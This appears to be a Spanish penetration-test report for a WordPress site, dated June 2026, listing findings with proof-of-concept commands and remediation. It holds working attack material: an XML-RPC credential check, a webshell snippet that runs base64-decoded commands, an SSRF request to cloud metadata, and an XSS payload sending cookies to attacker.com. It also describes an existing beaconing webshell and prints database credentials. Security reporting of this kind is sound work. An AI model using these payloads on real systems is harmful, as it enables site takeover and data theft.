lostpassword\n H-04AltoNonce de plugin expuesto en REST sin autenticaci\u00f3nFilevue \u00b7 /wp/v2/pages/7\n M-01MedioWordPress 7.0 / Elementor 4.0.2 \u2014 versiones desactualizadasCore + plugins\n M-02MedioEmail de usuario deducible por Gravatar hash (SHA-256)REST API \u00b7 Gravatar\n M-03MedioRecuperaci\u00f3n de contrase\u00f1a rota + oracle de usuariowp-login.php \u00b7 lostpassword\n M-04Mediowp-cron.php accesible p\u00fablicamentewp-cron.php\n L-01BajoCabeceras de seguridad ausentes (HSTS, X-Content-Type, Permissions-Policy)HTTP Headers \u00b7 Caddy\n L-02BajoOrigen Apache/versi\u00f3n filtrado en respuestas 404Apache 2.4.66 \u00b7 Cloudflare bypass\n L-03Bajoreadme.html accesible \u2014 divulgaci\u00f3n de versi\u00f3n WPWordPress Core\n L-04BajoCVE-2026-24072 Apache 2.4.66 mod_rewrite htaccess readApache 2.4.66\n I-01InfoContenedor Docker con hardening seccomp/AppArmor efectivoInfraestructura\n I-02InfoDB creds en claro en variable de entorno del containerDocker env \u00b7 WORDPRESS_DB_*\n I-03InfoKernel 6.8.0-117 vulnerable a CVE-2026-46333 pero bloqueado por seccompKernel \u00b7 pidfd_getfd\n \n \n \n\n \n\n \nHallazgos Detallados\n\n \n \n\n \n\n C-01\n Cr\u00edtico\n Credencial de administrador d\u00e9bil \u2014 compromiso total v\u00eda XML-RPC\n \n \n\n \nDescripci\u00f3n\n \nLa cuenta de administrador marce ten\u00eda la contrase\u00f1a marce123. XML-RPC no implementa rate-limiting, permitiendo descubrirla mediante credential oracle con pocas decenas de intentos. Una vez autenticados, se obtuvo acceso total: lectura de opciones del sitio, creaci\u00f3n/edici\u00f3n de posts, subida de ficheros y instalaci\u00f3n de plugins.\n \nPoC\n \n# Descubrimiento de credenciales v\u00eda XML-RPC oracle\ncurl -X POST https://www.columtech.online/xmlrpc.php \\\n -d '<?xml version=\"1.0\"?><methodCall>\n <methodName>wp.getUsersBlogs</methodName>\n <params>\n <param><value><string>marce</string></value></param>\n <param><value><string>marce123</string></value></param>\n </params></methodCall>'\n\n# Respuesta: isAdmin=1, blogName=Laboratorio\n# RESULTADO: acceso de administrador confirmado\n \nImpacto\n \n\n \nAcceso completo al panel de administraci\u00f3n WordPress\n \nInstalaci\u00f3n de plugins arbitrarios \u2192 RCE\n \nLectura/escritura de todos los contenidos y usuarios\n \nDefacing del sitio demostrado\n \nSubida de ficheros al servidor\n \n \nRemediaci\u00f3n\n \n# 1. Cambiar contrase\u00f1a inmediatamente (m\u00ednimo 20 chars, aleatoria)\n# 2. Deshabilitar XML-RPC si no se usa Jetpack/app m\u00f3vil\nadd_filter('xmlrpc_enabled', '__return_false');\n\n# 3. Alternativamente, bloquear en Caddy/Cloudflare\n# Cloudflare WAF rule: (http.request.uri.path eq \"/xmlrpc.php\") \u2192 Block\n \n \n\n \n \n\n \n\n C-02\n Cr\u00edtico\n Webshell externa preexistente \u2014 WSO Mr.X v2.5\n \n \n\n \nDescripci\u00f3n\n \nSe encontr\u00f3 /var/www/html/wp-loginizer.php (237 KB), una webshell WSO (\u00abWeb Shell by orb\u00bb) Mr.X BYPASS v2.5 completamente funcional. El fichero incluye un file manager con terminal, file editor, y un beacon de tracking que reporta la URL de cada visita a https://cdn.privdayz.com/images/logo.jpg. El sitio fue comprometido por un atacante externo antes de esta auditor\u00eda (posts de spam en ruso desde 2023).\n \nPoC\n \ncurl https://www.columtech.online/wp-loginizer.php\n# Responde con file manager completo (sin autenticaci\u00f3n adicional)\n# Contiene: terminal, editor de archivos, upload\n# BEACON: POST a cdn.privdayz.com con location.href del visitante\n \nImpacto\n \n\n \nAtacante externo tiene acceso de shell activo como www-data\n \nExfiltraci\u00f3n de datos de visitantes a servidor tercero (privdayz.com)\n \nPosible pivoting a base de datos y archivos\n \nRGPD/privacidad: beacon rastrea IPs de visitantes\n \n \nRemediaci\u00f3n\n \n# URGENTE \u2014 eliminar el fichero inmediatamente\nrm /var/www/html/wp-loginizer.php\nrm /var/www/html/2ops.php # file manager adicional\nrm /var/www/html/x.php # webshell de auditor\u00eda (nuestro)\nrm /var/www/html/rs.php # reverse shell de auditor\u00eda (nuestro)\nrm /var/www/html/rs2.php # reverse shell de auditor\u00eda (nuestro)\n\n# Auditar TODOS los archivos modificados en los \u00faltimos 90 d\u00edas:\nfind /var/www/html -newer /var/www/html/wp-config.php -name \"*.php\" | sort\n \n \n\n \n \n\n \n\n C-03\n Cr\u00edtico\n RCE como www-data v\u00eda Code Snippets REST API\n \n \n\n \nDescripci\u00f3n\n \nCon acceso de administrador, se instal\u00f3 el plugin Code Snippets v\u00eda REST API autenticada (POST /wp/v2/plugins). El plugin expone una API REST que permite crear snippets PHP que se ejecutan en cada carga de p\u00e1gina. Se cre\u00f3 un snippet con webshell (shell_exec(base64_decode($_GET['c4sh3r']))) que ejecuta comandos arbitrarios como uid=33(www-data).\n \nPoC\n \n# Instalar plugin\ncurl -X POST https://columtech.online/index.php?rest_route=/wp/v2/plugins \\\n -H \"X-WP-Nonce: $NONCE\" -H \"Cookie: $ADMIN_COOKIES\" \\\n -d '{\"slug\":\"code-snippets\",\"status\":\"active\"}'\n\n# Crear snippet webshell\ncurl -X POST https://columtech.online/index.php?rest_route=/code-snippets/v1/snippets \\\n -H \"X-WP-Nonce: $NONCE\" \\\n -d '{\"code\":\"if(isset($_GET[\\\"c4sh3r\\\"])){die(shell_exec(base64_decode($_GET[\\\"c4sh3r\\\"])));}\", \"scope\":\"front-end\",\"active\":true}'\n\n# Ejecutar comando\ncurl \"https://columtech.online/?c4sh3r=$(echo -n 'id' | base64)\"\n# uid=33(www-data) gid=33(www-data) groups=33(www-data)\n \nImpacto\n \n\n \nEjecuci\u00f3n remota de comandos en el servidor\n \nLectura de wp-config.php y credenciales de base de datos\n \nEscritura en /var/www/html (filesystem del host)\n \nDefacing del sitio completo\n \nReverse shell interactiva al atacante demostrada\n \n \nRemediaci\u00f3n\n \n# Eliminar plugin Code Snippets y snippet malicioso\n# Revisar y eliminar TODOS los plugins no esenciales\n# Cambiar credenciales admin PRIMERO (ver C-01)\n# Implementar WAF rule para bloquear par\u00e1metros ?c4sh3r=\n \n \n\n \n \n\n \n\n H-01\n Alto\n XML-RPC expuesto \u2014 SSRF confirmado + amplificaci\u00f3n de credential testing\n \n \n\n \nDescripci\u00f3n\n \nxmlrpc.php est\u00e1 habilitado con system.multicall disponible. El m\u00e9todo pingback.ping causa que el servidor realice peticiones HTTP salientes arbitrarias (SSRF). Se confirm\u00f3 que el servidor intenta alcanzar 169.254.169.254 (metadata cloud) y puede escanear puertos internos por diferencia de tiempos.\n \nPoC\n \n# SSRF \u2014 servidor hace fetch a URL controlada por atacante\ncurl -X POST https://columtech.online/xmlrpc.php \\\n -d '<methodCall><methodName>pingback.ping</methodName>\n <params>\n <param><value><string>http://169.254.169.254/</string></value></param>\n <param><value><string>https://columtech.online/?p=1</string></value></param>\n </params></methodCall>'\n\n# Resultado: 11.3s timeout \u2192 servidor alcanza metadata endpoint\n# Externo (example.com): 1.3s | Interno (localhost:80): 0.3s\n \nImpacto\n \n\n \nSSRF: escaneo de puertos/servicios internos y metadata cloud\n \nsystem.multicall: amplificaci\u00f3n de credential testing sin generar logs proporcionales\n \nPingback abuse: DDoS contra terceros usando el servidor como amplificador\n \n \nRemediaci\u00f3n\n \nadd_filter('xmlrpc_enabled', '__return_false');\n# O bloquear en Cloudflare/Caddy si se necesita para Jetpack\n \n \n\n \n \n\n \n\n H-02\n Alto\n CVE-2026-6127 \u2014 Elementor 4.0.2 Stored XSS v\u00eda REST API (form-encoded PATCH)\n \n \n\n \nDescripci\u00f3n\n \nElementor 4.0.2 es vulnerable a CVE-2026-6127 (CVSS 6.4). El campo _elementor_data se registra con show_in_rest sin sanitize_callback. Un atacante con rol Contributor+ puede enviar una petici\u00f3n PATCH form-encoded (no JSON) y la sanitizaci\u00f3n se salta completamente, almacenando JavaScript arbitrario que se ejecuta para cualquier visitante, incluyendo el administrador.\n \nPoC\n \ncurl -X PATCH https://columtech.online/index.php?rest_route=/wp/v2/posts/1 \\\n -H \"Authorization: Basic $(echo -n 'contributor:pass' | base64)\" \\\n -H \"Content-Type: application/x-www-form-urlencoded\" \\\n --data-urlencode 'meta[_elementor_edit_mode]=builder' \\\n --data-urlencode 'meta[_elementor_data]=[{\"elType\":\"widget\",\"widgetType\":\"html\",\"settings\":{\"html\":\"<svg/onload=fetch(\\\"//attacker.com/\\\"+document.cookie)>\"}}]'\n \nImpacto\n \n\n \nXSS persistente \u2192 robo de session cookies del administrador\n \nAccount takeover del administrador cuando visita la p\u00e1gina\n \nCadena hacia defacing y RCE desde XSS (auto-crear admin v\u00eda fetch)\n \n \nRemediaci\u00f3n\n \n# Actualizar Elementor a \u2265 4.0.5\n# Workaround: restringir rol Contributor a usuarios de confianza\n \n \n\n \n \n\n \n\n H-03\n Alto\n Enumeraci\u00f3n de usuarios admin por 4 v\u00edas sin rate-limit\n \n \n\n \nDescripci\u00f3n\n \nEl username del administrador (marce) se obtiene por al menos 4 m\u00e9todos distintos, ninguno protegido por rate-limit ni captcha:\n \nPoC\n \n# M\u00e9todo 1: REST API bypass del filtro de Caddy\ncurl \"https://columtech.online/index.php?rest_route=/wp/v2/users\"\n# [{\"id\":1,\"slug\":\"marce\",...},{\"id\":2,\"slug\":\"prueba\",...}]\n\n# M\u00e9todo 2: author redirect\ncurl -I \"https://columtech.online/?author=1\"\n# 301 \u2192 /author/marce/\n\n# M\u00e9todo 3: wp-login oracle (respuesta diferente seg\u00fan usuario)\n# v\u00e1lido: \"la contrase\u00f1a que has introducido para marce no es correcta\"\n# inv\u00e1lido: \"El nombre de usuario nope123 no est\u00e1 registrado\"\n\n# M\u00e9todo 4: lostpassword oracle\n# v\u00e1lido: \"no se pudo enviar el correo electr\u00f3nico\" (usuario S\u00cd existe)\n# inv\u00e1lido: \"no hay ninguna cuenta con ese nombre de usuario\"\n \nRemediaci\u00f3n\n \n# Restringir REST users a autenticados:\nadd_filter('rest_endpoints', function($ep){\n if(isset($ep['/wp/v2/users'])) unset($ep['/wp/v2/users']);\n return $ep;\n});\n# Unificar mensajes de error de wp-login y lostpassword\n# Bloquear ?author= redirect\n \n \n\n \n \n\n \n\n H-04\n Alto\n Nonce de plugin Filevue expuesto en REST API sin autenticaci\u00f3n\n \n \n\n \nDescripci\u00f3n\n \nLa p\u00e1gina \u00abClient Portal\u00bb (ID=7) contiene el formulario de login del plugin Filevue con un nonce WordPress (_wpnonce) embebido en el HTML renderizado. Este HTML es devuelto por la REST API GET /wp/v2/pages/7 sin autenticaci\u00f3n, exponiendo el nonce a cualquier atacante.\n \nPoC\n \ncurl \"https://columtech.online/index.php?rest_route=/wp/v2/pages/7\" | \\\n grep -o '_wpnonce\" value=\"[^\"]*\"'\n# _wpnonce\" value=\"ecd04e0712\"\n\n# El nonce permite enviar peticiones autenticadas a admin-post.php\n# sin estar logueado \u2014 usado para probar SQLi en filevue_client_login\n \nRemediaci\u00f3n\n \n# No embeber nonces en contenido REST p\u00fablico\n# Restringir /wp/v2/pages a usuarios autenticados o excluir p\u00e1gina Client Portal\n# Generar nonce en el lado cliente (JS) tras autenticaci\u00f3n\n \n \n\n \n \n\n \n\n M-01\n Medio\n Versiones desactualizadas \u2014 WordPress 7.0 / Elementor 4.0.2 / Apache 2.4.66\n \n \n\n \nDescripci\u00f3n\n \nElementor 4.0.2 es vulnerable a CVE-2026-6127 (parcheado en 4.0.5). Apache 2.4.66 es vulnerable a CVE-2026-23918 (RCE HTTP/2) y CVE-2026-24072 (read bypass via htaccess), ambos parcheados en 2.4.67. El meta generator expone versiones exactas.\n \nRemediaci\u00f3n\n \n# Actualizar Elementor: wp plugin update elementor\n# Actualizar Apache: apt-get upgrade apache2\n# Eliminar generator meta:\nremove_action('wp_head', 'wp_generator');\n# Eliminar readme.html y license.txt del webroot\n \n \n\n \n \n\n \n\n M-02\n Medio\n Email de usuario deducible por reverse Gravatar SHA-256\n \n \n\n \nDescripci\u00f3n\n \nLas URLs de avatar Gravatar incluyen el hash SHA-256 del email normalizado del usuario. El email de la cuenta prueba (prueba@gmail.com) fue deducido probando candidatos comunes contra el hash expuesto p\u00fablicamente en GET /wp/v2/users/2.\n \nPoC\n \nimport hashlib\nhash_target = \"913ef45dd4e1f647359a846bca8bffb8d25b22f2a79d34d71c9c90ef0eb53024\"\nfor email in [\"prueba@gmail.com\", ...]:\n if hashlib.sha256(email.encode()).hexdigest() == hash_target:\n print(\"MATCH:\", email)\n# MATCH: prueba@gmail.com\n \nRemediaci\u00f3n\n \n# Desactivar Gravatar en WordPress (usar avatar local)\n# O usar un email que no sea predecible para cuentas sensibles\n \n \n\n \n \n\n \n\n M-03\n Medio\n Recuperaci\u00f3n de contrase\u00f1a rota + oracle de usuario\n \n \n\n \nDescripci\u00f3n\n \nEl formulario de recuperaci\u00f3n de contrase\u00f1a falla con el error \u00abno se pudo enviar el correo electr\u00f3nico\u00bb para usuarios v\u00e1lidos, y \u00abno hay ninguna cuenta\u00bb para usuarios inexistentes. Esto act\u00faa como or\u00e1culo de enumeraci\u00f3n. Adem\u00e1s, el correo no se env\u00eda, por lo que el reset es inoperable \u2014 impacto en disponibilidad y posible vector de host-header injection si se configura SMTP en el futuro.\n \nRemediaci\u00f3n\n \n# 1. Configurar SMTP (WP Mail SMTP o Mailgun)\n# 2. Unificar mensaje de error (no revelar si usuario existe)\n# 3. Fijar siteurl y home en wp-config.php para prevenir host-header injection\ndefine('WP_SITEURL', 'https://www.columtech.online');\ndefine('WP_HOME', 'https://www.columtech.online');\n \n \n\n \n \n\n \n\n M-04\n Medio\n wp-cron.php accesible p\u00fablicamente\n \n \n\n \nDescripci\u00f3n\n \nwp-cron.php devuelve HTTP 200 y puede ser llamado externamente. Permite amplificar la carga del servidor llam\u00e1ndolo en bucle, actuando como vector de DoS.\n \nRemediaci\u00f3n\n \n# En wp-config.php:\ndefine('DISABLE_WP_CRON', true);\n# En crontab del servidor:\n*/5 * * * * curl -s https://www.columtech.online/wp-cron.php?doing_wp_cron=1 >/dev/null\n \n \n\n \n \n\n \n\n L-01\n Bajo\n Cabeceras de seguridad HTTP ausentes\n \n \n\n \nDescripci\u00f3n\n \nFaltan Strict-Transport-Security (HSTS), X-Content-Type-Options: nosniff y Permissions-Policy. La CSP solo cubre frame-ancestors 'self'.\n \nRemediaci\u00f3n\n \n# En Caddy (Caddyfile):\nheader Strict-Transport-Security \"max-age=31536000; includeSubDomains; preload\"\nheader X-Content-Type-Options \"nosniff\"\nheader Permissions-Policy \"geolocation=(), microphone=(), camera=()\"\n \n \n\n \n \n\n \n\n L-02\n Bajo\n Divulgaci\u00f3n de origen Apache y versi\u00f3n en p\u00e1ginas 404\n \n \n\n \nDescripci\u00f3n\n \nLas p\u00e1ginas 404 generadas por Apache revelan: Apache/2.4.66 (Debian) Server at www.columtech.online Port 80 \u2014 versi\u00f3n exacta, distribuci\u00f3n y que escucha en puerto 80 sin TLS.\n \nRemediaci\u00f3n\n \n# En apache2.conf:\nServerTokens Prod\nServerSignature Off\n \n \n\n \n \n\n \n\n L-03\n Bajo\n readme.html accesible \u2014 divulgaci\u00f3n de versi\u00f3n WordPress\n \n \n\n \nDescripci\u00f3n\n \n/readme.html devuelve HTTP 200 y revela la versi\u00f3n exacta de WordPress. Facilita targeting con CVEs de versi\u00f3n espec\u00edfica.\n \nRemediaci\u00f3n\n \nrm /var/www/html/readme.html /var/www/html/license.txt\n \n \n\n \n \n\n \n\n L-04\n Bajo\n CVE-2026-24072 Apache 2.4.66 \u2014 htaccess mod_rewrite file read\n \n \n\n \nDescripci\u00f3n\n \nApache 2.4.66 es vulnerable a CVE-2026-24072: un usuario con acceso de escritura a .htaccess puede leer ficheros fuera de su directorio con los privilegios del proceso httpd. En este caso, www-data ya tiene ese acceso, pero el vector es relevante en escenarios multiusuario.\n \nRemediaci\u00f3n\n \n# Actualizar Apache a 2.4.67+\napt-get upgrade apache2\n \n \n\n \n \n\n \n\n I-01\n Info\n Hardening de contenedor Docker \u2014 seccomp + AppArmor + ptrace_scope=3\n \n \n\n \nDescripci\u00f3n\n \nEl contenedor Docker presenta un perfil de hardening excepcional que bloque\u00f3 todos los CVEs de escalada de privilegios probados (12 t\u00e9cnicas distintas). Los syscalls AF_ALG, CLONE_NEWUSER, io_uring_setup y pidfd_getfd est\u00e1n bloqueados por seccomp. AppArmor docker-default bloquea escrituras a ficheros de sistema. ptrace_scope=3 impide toda inspecci\u00f3n de procesos. Este es el nivel de hardening correcto para workloads en producci\u00f3n.\n \nCVEs probados y bloqueados\n \nCVE-2026-31431 (Copy Fail) \u2192 AF_ALG bloqueado por seccomp\nCVE-2026-43284 (Dirty Frag) \u2192 CLONE_NEWUSER bloqueado\nCVE-2026-46300 (Fragnesia) \u2192 CLONE_NEWUSER bloqueado\nCVE-2026-46333 (ssh-keysign) \u2192 pidfd_getfd bloqueado\nio_uring exploits \u2192 io_uring_setup bloqueado\nGameOver(lay) \u2192 CLONE_NEWUSER bloqueado\nCrackArmor \u2192 AppArmor FS inaccesible en container\nCVE-2026-27456 (mount TOCTOU) \u2192 Sin /etc/fstab user,loop entries\ngpasswd shadow attack \u2192 AppArmor bloquea escritura /etc/gshadow\n \n \n\n \n \n\n \n\n I-02\n Info\n Credenciales DB en texto claro en variables de entorno del container\n \n \n\n \nDescripci\u00f3n\n \nLas credenciales de MySQL est\u00e1n accesibles en texto claro v\u00eda /proc/self/environ para cualquier proceso del container (incluyendo www-data tras RCE):\n \nWORDPRESS_DB_HOST=wordpress_db:3306\nWORDPRESS_DB_USER=wp_user\nWORDPRESS_DB_PASSWORD=wp_password\nWORDPRESS_DB_NAME=wordpress\n \nRemediaci\u00f3n\n \n# Usar Docker secrets en lugar de env vars para credenciales\n# O montar fichero de config encriptado desde un secrets manager\n \n \n\n \n \n\n \n\n I-03\n Info\n Kernel 6.8.0-117 vulnerable a CVE-2026-46333 (bloqueado por seccomp)\n \n \n\n \nDescripci\u00f3n\n \nEl kernel 6.8.0-117-generic (compilado el 5 Mayo 2026) es anterior al fix de CVE-2026-46333 (publicado el 14 Mayo 2026). La vulnerabilidad permite leer /etc/shadow mediante una race condition en __ptrace_may_access() + pidfd_getfd. El seccomp del container bloquea el syscall pidfd_getfd (438), mitigando completamente el exploit. Se verific\u00f3 que el exploit p\u00fablico fall\u00f3 con \u00abno hit in 500 rounds\u00bb.\n \nRemediaci\u00f3n\n \n# Actualizar el kernel del host cuando est\u00e9 disponible el parche\n# El seccomp profile actual ya protege contra este CVE\n \n \n\n \n\n \n\n \nPlan de Remediaci\u00f3n \u00b7 Prioridad\n \n\n HOY (cr\u00edtico): Cambiar contrase\u00f1a de marce (m\u00ednimo 20 chars). Eliminar wp-loginizer.php, 2ops.php y todos los ficheros de auditor\u00eda del webroot. Desactivar XML-RPC. Eliminar plugin Code Snippets y el snippet malicioso.\n \n \n\n Esta semana: Actualizar Elementor a \u2265 4.0.5 (parchea CVE-2026-6127). Actualizar Apache a 2.4.67 (parchea CVE-2026-23918 y CVE-2026-24072). Auditar todos los archivos PHP modificados en los \u00faltimos 90 d\u00edas. Configurar SMTP y unificar mensajes de error de wp-login. Restringir REST API users a autenticados. A\u00f1adir cabeceras de seguridad HTTP.\n \n \n\n Este mes: Implementar 2FA para el panel de administraci\u00f3n. Migrar credenciales DB a Docker secrets. Configurar DISABLE_WP_CRON y cron real del sistema. Implementar WAF en Cloudflare para xmlrpc.php y ?author=. Eliminar readme.html y establecer ServerTokens Prod.\n \n \n\n \n\n \nAnexo \u00b7 Comandos de verificaci\u00f3n post-remediaci\u00f3n\n \nEjecutar estos comandos tras aplicar las correcciones para confirmar que los vectores est\u00e1n cerrados:\n \n# C-01: XML-RPC deshabilitado\ncurl -s -X POST https://columtech.online/xmlrpc.php | grep -c \"XML-RPC server accepts\"\n# Esperado: 0\n\n# C-02: Webshells eliminadas\ncurl -o /dev/null -w \"%{http_code}\" https://columtech.online/wp-loginizer.php\n# Esperado: 404\n\n# H-03: REST users requiere autenticaci\u00f3n\ncurl -s https://columtech.online/index.php?rest_route=/wp/v2/users | jq '.code'\n# Esperado: \"rest_forbidden\"\n\n# H-03: ?author= no revela usuario\ncurl -s -o /dev/null -w \"%{redirect_url}\" \"https://columtech.online/?author=1\"\n# Esperado: vac\u00edo o URL sin slug de usuario\n\n# L-01: HSTS presente\ncurl -sI https://columtech.online/ | grep -i strict-transport\n# Esperado: Strict-Transport-Security: max-age=...\n\n# L-03: readme.html eliminado\ncurl -o /dev/null -w \"%{http_code}\" https://columtech.online/readme.html\n# Esperado: 404\n \n\n\n\n\n\n Auditor\u00eda realizada por c4sh3r \u00b7 Reporte generado el 2026-06-04\n Todos los hallazgos fueron verificados en entorno real con autorizaci\u00f3n del propietario. Las pruebas de escritura (defacing, webshells) fueron limpiadas inmediatamente tras la verificaci\u00f3n. PII real redactada.\n\n\n\n\n", "creation_timestamp": "2026-06-03T23:46:41.000000Z"} {"uuid": "5d6554f7-d228-462b-abd3-3233cbf92ca0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/C4sh3R/1f99346b1086e7d358ff1be8f5be7a42", "content": "\n\n\n\n\n\nColumtech \u2014 Informe de Auditor\u00eda de Seguridad \u00b7 c4sh3r\n\n :root {\n --bg: #0b0d12;\n --bg-2: #11151c;\n --panel: #161b25;\n --panel-2: #1d2330;\n --border: #2a3142;\n --text: #e6e9ef;\n --text-dim: #99a2b3;\n --accent: #ff4d6d;\n --accent-2: #ffb86b;\n --crit: #ff3d57;\n --high: #ff8b3d;\n --med: #ffd84a;\n --low: #4ac6ff;\n --info: #8c9fb0;\n --ok: #3ddc97;\n --code-bg: #0a0d14;\n --mono: ui-monospace, \"JetBrains Mono\", \"Fira Code\", Menlo, Consolas, monospace;\n }\n * { box-sizing: border-box; }\n html, body { margin: 0; padding: 0; background: var(--bg); color: var(--text);\n font-family: -apple-system, BlinkMacSystemFont, \"Segoe UI\", Roboto, \"Helvetica Neue\", Arial, sans-serif;\n line-height: 1.55; -webkit-font-smoothing: antialiased; }\n a { color: var(--accent-2); text-decoration: none; }\n a:hover { text-decoration: underline; }\n .hero {\n padding: 60px 40px 50px;\n background:\n radial-gradient(1200px 400px at 10% -10%, rgba(255,77,109,0.25), transparent 60%),\n radial-gradient(900px 380px at 100% 0%, rgba(255,184,107,0.15), transparent 60%),\n linear-gradient(180deg, #0e1219, #0b0d12);\n border-bottom: 1px solid var(--border);\n }\n .hero-inner { max-width: 1100px; margin: 0 auto; }\n .eyebrow {\n display: inline-flex; align-items: center; gap: 8px;\n font-family: var(--mono); font-size: 12px; letter-spacing: 0.15em;\n text-transform: uppercase; color: var(--accent);\n padding: 4px 10px; border: 1px solid rgba(255,77,109,0.35);\n border-radius: 999px; background: rgba(255,77,109,0.08);\n }\n .hero h1 { font-size: 44px; line-height: 1.1; margin: 18px 0 10px; letter-spacing: -0.02em; }\n .hero h1 .accent { color: var(--accent); }\n .hero .sub { color: var(--text-dim); font-size: 17px; max-width: 720px; }\n .meta { margin-top: 30px; display: grid; grid-template-columns: repeat(4, 1fr); gap: 14px; }\n .meta .card { background: rgba(22,27,37,0.7); border: 1px solid var(--border); border-radius: 10px; padding: 14px 16px; }\n .meta .card .k { font-size: 11px; text-transform: uppercase; letter-spacing: 0.12em; color: var(--text-dim); }\n .meta .card .v { font-family: var(--mono); font-size: 14px; margin-top: 6px; word-break: break-all; }\n .author-strip {\n display: flex; align-items: center; gap: 14px; margin-top: 24px;\n padding: 12px 16px; border: 1px dashed var(--border); border-radius: 10px;\n background: rgba(255,255,255,0.02); font-family: var(--mono); font-size: 13px; color: var(--text-dim);\n }\n .author-strip strong { color: var(--accent); }\n .container { max-width: 1100px; margin: 0 auto; padding: 40px; }\n section { margin-bottom: 60px; }\n h2 { font-size: 26px; margin: 0 0 18px; letter-spacing: -0.01em; display: flex; align-items: center; gap: 12px; }\n h2::before { content: ''; width: 4px; height: 22px; background: var(--accent); border-radius: 2px; }\n h3 { font-size: 19px; margin: 22px 0 10px; }\n p { color: var(--text); }\n p.dim { color: var(--text-dim); }\n .stats { display: grid; grid-template-columns: repeat(5, 1fr); gap: 12px; margin-top: 10px; }\n .stat { background: var(--panel); border: 1px solid var(--border); border-radius: 12px; padding: 18px; text-align: center; }\n .stat .num { font-size: 32px; font-weight: 700; font-family: var(--mono); }\n .stat .lbl { font-size: 12px; text-transform: uppercase; letter-spacing: 0.12em; color: var(--text-dim); margin-top: 6px; }\n .stat.crit .num { color: var(--crit); } .stat.high .num { color: var(--high); }\n .stat.med .num { color: var(--med); } .stat.low .num { color: var(--low); }\n .stat.info .num { color: var(--info); }\n table.summary { width: 100%; border-collapse: collapse; margin-top: 16px; background: var(--panel); border: 1px solid var(--border); border-radius: 12px; overflow: hidden; }\n table.summary th, table.summary td { padding: 12px 14px; text-align: left; border-bottom: 1px solid var(--border); font-size: 14px; }\n table.summary th { background: var(--panel-2); font-weight: 600; font-size: 12px; text-transform: uppercase; letter-spacing: 0.08em; color: var(--text-dim); }\n table.summary tr:last-child td { border-bottom: none; }\n table.summary tr:hover td { background: rgba(255,255,255,0.02); }\n .badge { display: inline-block; padding: 3px 9px; border-radius: 4px; font-size: 11px; font-weight: 700; font-family: var(--mono); letter-spacing: 0.05em; text-transform: uppercase; }\n .badge.crit { background: rgba(255,61,87,0.15); color: var(--crit); border: 1px solid rgba(255,61,87,0.4); }\n .badge.high { background: rgba(255,139,61,0.13); color: var(--high); border: 1px solid rgba(255,139,61,0.4); }\n .badge.med { background: rgba(255,216,74,0.13); color: var(--med); border: 1px solid rgba(255,216,74,0.4); }\n .badge.low { background: rgba(74,198,255,0.13); color: var(--low); border: 1px solid rgba(74,198,255,0.4); }\n .badge.info { background: rgba(140,159,176,0.13); color: var(--info); border: 1px solid rgba(140,159,176,0.4); }\n .finding { background: var(--panel); border: 1px solid var(--border); border-radius: 14px; margin-top: 22px; overflow: hidden; }\n .finding .head { display: flex; align-items: center; gap: 14px; flex-wrap: wrap; padding: 18px 22px; background: var(--panel-2); border-bottom: 1px solid var(--border); }\n .finding.crit .head { box-shadow: inset 4px 0 0 0 var(--crit); }\n .finding.high .head { box-shadow: inset 4px 0 0 0 var(--high); }\n .finding.med .head { box-shadow: inset 4px 0 0 0 var(--med); }\n .finding.low .head { box-shadow: inset 4px 0 0 0 var(--low); }\n .finding.info .head { box-shadow: inset 4px 0 0 0 var(--info); }\n .finding .head .id { font-family: var(--mono); color: var(--text-dim); font-size: 13px; }\n .finding .head .title { font-size: 17px; font-weight: 600; flex: 1; }\n .finding .body { padding: 22px; }\n .finding .body h4 { font-size: 11px; text-transform: uppercase; letter-spacing: 0.14em; color: var(--text-dim); margin: 18px 0 8px; }\n .finding .body h4:first-child { margin-top: 0; }\n .finding ul { margin: 0 0 6px; padding-left: 22px; }\n .finding li { margin-bottom: 4px; }\n pre, code { font-family: var(--mono); font-size: 13px; }\n pre { background: var(--code-bg); border: 1px solid var(--border); border-radius: 8px; padding: 14px 16px; overflow-x: auto; line-height: 1.5; color: #d6dbe6; }\n code.inline { background: rgba(255,255,255,0.05); padding: 1px 6px; border-radius: 4px; border: 1px solid var(--border); font-size: 12px; }\n .kv { display: grid; grid-template-columns: 160px 1fr; gap: 6px 16px; font-size: 13.5px; }\n .kv .k { color: var(--text-dim); font-family: var(--mono); font-size: 12px; padding-top: 2px; }\n .callout { border-left: 3px solid var(--accent); background: rgba(255,77,109,0.05); padding: 14px 18px; border-radius: 0 8px 8px 0; margin: 12px 0; font-size: 14px; }\n .callout.danger { border-color: var(--crit); background: rgba(255,61,87,0.07); }\n .callout.warn { border-color: var(--high); background: rgba(255,139,61,0.06); }\n .callout.ok { border-color: var(--ok); background: rgba(61,220,151,0.06); }\n footer { border-top: 1px solid var(--border); padding: 36px 40px; margin-top: 40px; color: var(--text-dim); text-align: center; font-size: 13px; background: var(--bg-2); }\n footer .sig { font-family: var(--mono); font-size: 14px; color: var(--accent); }\n .chain { background: var(--code-bg); border: 1px solid var(--border); border-radius: 10px; padding: 20px 24px; margin: 14px 0; }\n .chain-step { display: flex; align-items: flex-start; gap: 14px; margin-bottom: 10px; }\n .chain-step:last-child { margin-bottom: 0; }\n .chain-num { background: var(--accent); color: #fff; border-radius: 50%; width: 22px; height: 22px; display: flex; align-items: center; justify-content: center; font-size: 12px; font-weight: 700; flex-shrink: 0; margin-top: 2px; }\n .chain-text { font-family: var(--mono); font-size: 13px; color: #d6dbe6; }\n .chain-arrow { color: var(--accent); font-size: 18px; margin: 4px 0; text-align: center; }\n @media (max-width: 760px) {\n .hero h1 { font-size: 32px; }\n .meta, .stats { grid-template-columns: repeat(2, 1fr); }\n .container, .hero { padding: 30px 22px; }\n }\n\n\n\n\n\n\n \n\n \u258c Auditor\u00eda de Seguridad \u00b7 2026-06-03/04\n \nColumtech OnlineInforme de Seguridad Web\n \nEvaluaci\u00f3n de seguridad completa de columtech.online. Resultado: compromiso total \u2014 admin WordPress, RCE como www-data, defacing demostrado, escalada a root bloqueada por hardening excepcional.\n\n \n\n \n\nObjetivo\ncolumtech.online\n \n\nBackend\nApache 2.4.66 \u00b7 PHP 8.2.30 \u00b7 MySQL 8.0.45\n \n\nStack\nWP 7.0 \u00b7 Elementor 4.0.2 \u00b7 Docker \u00b7 Cloudflare \u00b7 Caddy\n \n\nFecha\n2026-06-03 / 04\n \n\n \n\n Autor del informe \u00b7 c4sh3r \u00b7 auditor\u00eda solicitada por el propietario del dominio \u00b7 